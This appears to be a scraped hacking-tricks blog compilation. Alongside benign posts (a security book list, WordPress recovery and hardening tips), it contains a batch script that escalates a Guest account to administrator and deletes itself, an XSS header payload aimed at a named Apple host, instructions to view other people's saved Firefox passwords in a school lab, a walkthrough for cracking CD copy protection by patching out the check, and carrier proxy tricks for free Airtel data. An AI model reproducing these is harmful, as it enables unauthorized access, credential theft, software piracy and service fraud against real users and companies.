5 Best Books to Learn Web Application Hacking and Penetration testing

5 Best Books to Learn Web Application Hacking and Penetration testing.......

 we have seen so many hacking incidents, data breach  password leaks and website deface that belongs to popular websites. All these happens because of web application vulnerabilities that could be patched but developer failed to notice vulnerabilities. This is the reason why Application security field is booming and creating jobs in bulk. If you also want to get into the security field, web application security and penetration testing can be a nice career option.

Now, you will start thinking how to learn all these things in easy way. There are so many institutes available which claim many big things. If you can not afford institution fee, you can learn everything by yourself. There are so many nice books available. Here I am listing 5 best books that can help you learn web application penetration testing and hacking in easy way.

The Tangled Web: A Guide to Securing Modern Web Applications

This is a nice book that covers web application hacking and penetration testing  It is written Michal Zalewski, one of the world's top browser security experts. This book is really nice and received much customer appreciation.

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws

The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws is a nice book released last year. It discuss the latest step-by-step techniques for attacking and defending the range of ever-evolving web applications. This book covers all framework, HTML5, cross domain integration  UI redress and many other flaws, attacks. If you want to learn website hacking and penetration testing this book is worth to buy.

Hacking Web Apps: Detecting and Preventing Web Application Security Problems

Are you worry about your website's security? Hacking Web Apps: Detecting and Preventing Web Application Security Problems is a nice book that covers all things about the web attacks, hacks and exploits. This book tells you how hackers hack web application and how you can protect from these malicious attackers.

Hacking Exposed Web Applications

This book is really popular among students who want to learn web application hacking and security. If you are interested in having career in web application security, you must buy this book. This book  is fully updated to cover new infiltration methods and countermeasures. Learn the most devastating methods used in today's hacks, including SQL injection, XSS, XSRF, phishing, and XML injection techniques

Web Hacking: Attacks and Defense

Web Hacking: Attacks and Defense is another nice book that covers everything we need to know for web hacking. It covers complete methodologies, including techniques and attacks, countermeasures, tools, plus case studies and web attack scenarios showing how different attacks work and why they work. It also describes about firewalls, servers, and web vulnerabilities that helps in building hacking concepts.

Download Windows RT Jailbreak Tool To Run Unsigned Apps

Download Windows RT Jailbreak Tool To Run Unsigned Apps
                             
                                    
               
As we reported to you a few days ago, a group of software creators managed to bypass Windows RT’s restrictions and run unsigned desktop applications on the operating system, basically opening the door to a whole new world of jailbreaking tools.

Even though the whole process of jailbreaking Windows RT was pretty complicated, it was only a matter of time before someone came up with a dedicated solution supposed to perform this task all by itself.

Now XDA Developers user “netham45” has released a batch file that does the entire jailbreakingprocess automatically, so it modifies the Windows RT system kernel without user interaction.

Even though the software developer admits that some users might get a BSOD after launching the application, he says that everything should work just fine on all Windows RT tablets, including Microsoft’s Surface RT.

At this point, there are only a few software solutions available on a jailbroken Windows RT unit, including VNC Server and Client, Putty and Bochs, but many more apps are very likely to be added to the list as new users do the jailbreak.

Microsoft has already confirmed the jailbreak, saying that it “applauds the ingenuity” of the software developers behind the project, but also hinted that a future fix could block their attempts to modify the system kernel.

netham45 explained that Microsoft would have a very hard time trying to block their efforts. “They can patch it through Windows Update, but since we have the ability to reinstall from recovery partitions we can revert any Windows Updates they release,” he explained.

The jailbreak would only last until the Windows RT device is restarted and even though it may sound like a glitch, it’s actually a simple way to make sure that you won’t lose the warranty or get infected by some sort of virus compiled for the tablet-oriented operating system.

What is HTTP Header Injection Vulnerability

           What is HTTP Header Injection Vulnerability

                     

HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.
I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:

GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache

How To Recover Your Hacked WordPress Website In Easy Steps?

How To Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However as a general law, the increasing popularity comes with a number of dangerous has gained attention of bad boys as well. There are so many people who are reporting the cases of hacked WordPress account on a regular basis. So I have thought of putting a complete guide to discuss how to recover your hacked WordPress.

                                     

Ways To Recover Hacked Account

Below is the perfect path to follow to get your hacked account back:

Backup – Even if your website is infected to a small extent, it is still very much necessary to secure the backup for your website before waiting for watching the things turning into worst. Don’t forget to take backup of your entire database and all files. You can also try for a faster solution by using BackupBuddy.

Change Login Details and Secret Access Keys – At the time you sense the hacking attempt, just try to login to your account to check whether your login details are still effective or not. If the username and password details are not yet changed then immediately change all the WordPress secret access keys in wp-config.php file and of-course your username and password.

Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying the compromises at the level of database. You can try out Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner you should make sure to move the next step stated below.

Installing Your WordPress Again – Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven’t deleted as stated above. Now you can delete the present file and replace it with your own file.

Review Content Folder – Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.

Analyze and Re-install Your Plug-ins – The next steps after completing with reviewing the folders’ content includes reviewing the plug-ins. Collect information about what plug-ins you are not using currently and uninstall them all for the time being. Now coming to all other activated plug-ins that you are using currently, deactivate and delete these plug-ins and then re-install and activate the active plug-ins.

Analyze Your Themes – Now the next thing that should be taken care of is the task of removing the extra themes which are not in use currently. Next task again involves reviewing your activated theme. Look through the PHP or Javascript code to find out any suspicious activity there. Most of the time hackers make such malicious changes in header.php or footer.php files.

Following this step by step guide can really help you a lot in getting your WordPress back. Also always remember to keep checking for the activities on your WordPress site. Also make it a habit to keep a time by time backup of your database. For more recovery details you can check onhttp://codex.wordpress.org/FAQ_My_site_was_hacked.

How to Secure before Getting hacked !

Every one is looking to make their blog looks secure and try to make their blog safe from hackers so that hackers can not take any kind of information from your blog. You can protect and increase security of your by doing following things :-

Chap Secure plugin

You can increase the security of your log-in by using Chap secure plugin, It helps in encrypting passwords by using CHAP protocol. It will help hacker to get in trouble.

Login Lockdown Plugin

This plugin helps a lot in stopping a hacker because if he is trying to play with your login screen then this plugin will limit hit after few wrong attempts.Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. 

WP Security Scan

This plugin helps to check all the codes of your website from hacking Malware and scripts. It can find out which code or which file has virus in the blog.

Updating WordPress regularly

Try to upgrade the WordPress regularly as soon as any new version is launched. Most of the bloggers do not update WordPress and chances are huge that old WordPress version can get hacked.

Tac Theme Checker

You can install a plugin “Tac Theme checker” which can check your theme before activating it. It helps you to check the complete theme when you upload it into Dashboard and it helps to check the files completely in few seconds.

Make your security Bullet proof

You should increase your security more and more by adding some official steps from WordPress website and you can read them here http://codex.wordpress.org/Hardening_WordPress.

Theme of your Blog

Your theme plays an important part in hacking, If you are using some cracked version of theme then be ready to get hacked soon. Cracked themes often have codes which helps to get you hacked. I would suggest that get a proper theme from any web design company so that there is no chance to get hacked due to unethical themes.

I hope these steps will help you to protect from all the hack attempts. If you have any other method then do let us know in below comments. Thank you

How To Hack Saved Password In Firefox ?

                  How To Hack Saved Password In Firefox ?

                                    

How to do ?

1. Open Firefox Web Broweser

2. Then Click on FireFox > Option > Option as shown in below picture

 

3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.

 

4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
 

 

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 

 

HOW TO CRACK ANY TYPE OF CD PROTECTION

     HOW TO CRACK ANY TYPE OF CD PROTECTION

              

Using W32Dasm, and HIEW. 

OK, let’s start:
First of all, you have to run the damn game you want to crack, without the CD.
The game, doesn’t work of course, (Please, don’t panic) BUT a window pops up, telling you an error message. 
This error message will help you to crack the game so, you’ve got to remember it.
For example: Please insert the - CD, or: You need the CD to play the - . 
( -, is the game you want to crack). Anyway, if you are so idiot and you can’t remember it, write it, in a little piece of paper.
Now, run Win32Dasm, and on the toolbar, press the first little button on the left, OR, go to Disassembler ->Open file to Disassemble. A menu will pop up. Select the exe which you want to crack. The disassemble, will take few minutes so, I suggest you, to go for shitting.

OK, it finished its process.
Now, in your screen, there is a strange text, and we can’t understand anything of course. Don’t worry, the only thing we have to do, ( If you want, you can change the font), is to click on the String Data References, the button next to the print button (Strn.REF).
You can see a window which is called String Data Items. Scroll down, and try to find the game’s error message. When you’ll find it, double click on it, and then, close the window, to go back to the Win32Dasm text.
As you can see you are somewhere in the CD check routine. This is the message’s place. Now comes the interesting and difficult part, so, be careful.
We don’t know what all these shits mean, BUT we must know the @ offset of every call and jump command.
Write down, every call and jump @ offset number. (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the h. Let’s go to HIEW, now.

HIEW:
To move up and down, use the cursor keys. Start HIEW. exe.
In the HIEW directory, there is a list of exes and programs. Go to the directory, which you saved the game’s exe, we want to crack, and click on the exe. Click F4, and then, a menu will pop up, with 3 words. Text, Hex, and Decode. Click on Decode, and now, we can understand the list of numbers.
Click F5, and you can now enter the number, we wrote down, in Win32Dasm. Type it, and you will be placed at the number’s place. The cursor is placed on a command.

Before I’ll continue, I want to explain you something. For example, if the command where our cursor is placed on, is E92BF9BF74, means that it is 5 bytes.
Every 2 numbers, are one byte: E9-2B-F9-BF-74 = 90-90-90-90-90. 10 letters, mean, 5 bytes.
OK, if you understood it, you can continue.

Press F3, which means edit, and now you can edit these ten numbers.
Type five times, the number 90. For every byte, 90. Now click on F10 to exit.

Lock your PRIVATE FOLDER

                       Lock your PRIVATE FOLDER

                              

1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

Hack Administrator from Guest

                        Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Best Hacking Tricks To Increase Your Internet Speed | Speed Up Your Net Speed

         Best Hacking Tricks To Increase Your Internet Speed | Speed Up Your Net Speed

               we all know that a slow internet connection really costs time and makes feel annoying . many friends ask me the ways to increase their internet speed.however . it's possible to do to some extent and make your internet

much better then it was in the past.

There are Two tricks that will help you to increase your internet speed..

First Method- Speed Up Your Net Speed By 20%

1. First you go to start button

2. Go To Run

3. Type gpedit.msc And Then Hit Enter.

4.Then Expand Adminsitrative Templates.

5.Then Network

6.Then QoS Packet Scheduler.

Now A New List Appear . Click On Limit Reservable Bandwidth.
Just Disable it.

Now You Click On Apply .

That's It Now You Are Done !! :)

Now Just Restart Your Computer . And I hope You will Get change in Your Speed

Hack Airtel Internet, Free Airtel Internet

              Hack Airtel Internet, Free Airtel Internet

                           

Discription:
                    now open any browser and put this address 122.170.122.214.proxytea.appspot.com/

Note: After '/' put your site name without http or https :::

For Example: 122.170.122.214.proxytea.appspot.com/www.newhackingtricks.com
                     122.170.122.214.proxytea.appspot.com/ur site
There are many app spot proxies working with our this IP use any of the below:
122.170.122.214.bypass- proxy.appspot.com/ur url
122.170.122.214.bypass- filter.appspot.com/ur url
122.170.122.214.cache-0035.appspot.com/ ur url
122.170.122.214.cache-049.appspot.com/ ur url
 122.170.122.214.cache-0046.appspot.com/ ur url

Airtel Free GPRS Trick December 2013

                Airtel Free GPRS Trick December 2013

                           

Discription:
                    

• You can freebrowse,download at 2g/3g speed works with ucweb,opera,chrome at some other browsers .
• Before using this frist we check than our sim compatible for this trick.Just open airtel.in in Default browser using airtelgprssetting if its opens than your sim is compatible.
• if its not i have also a solution for it :)

UC Web Trick:

Steps to follow:

1.  First make new settings in your mobile using below settings

proxy : 172. 245.213.11
port   :  80
Apn   : airtelgprs.com

2. Now save your settings and set this settings as default settings in your mobile ( if this settings not works in your nokia mobile then make use of prov maker to create settings)
3. now install your ucweb in your mobile , open your application
4. Now in handler menu in front query type as below

203.115.112.5/~rkhfreec/nph-proxy.cgi/00/http/

5. Save settings and let browser to install ( instead 203.115.112.5 you can use airtel.in,airtellive.com or for all free home pages )

Opera mini handler trick: 

1.  First you have to make a new settings in your mobile following as below

proxy : 37.228.106.226
port   :  80
Apn   : airtelgprs.com

2. Now save your settings and set this settings as default settings in your mobile
3. now install your ucweb in your mobile , open your application
4. Now in handler menu in front query type as below

airtellive.com/ -opera/nph-gxt.port/20/http/  (for all)
airtel.in/wps/ portal/-opera/nph-gxt.port/20/http/ (for blocked sim users)

5. Save settings and let browser to install ( instead of airtel.in,airtellive.com you may use other free pages )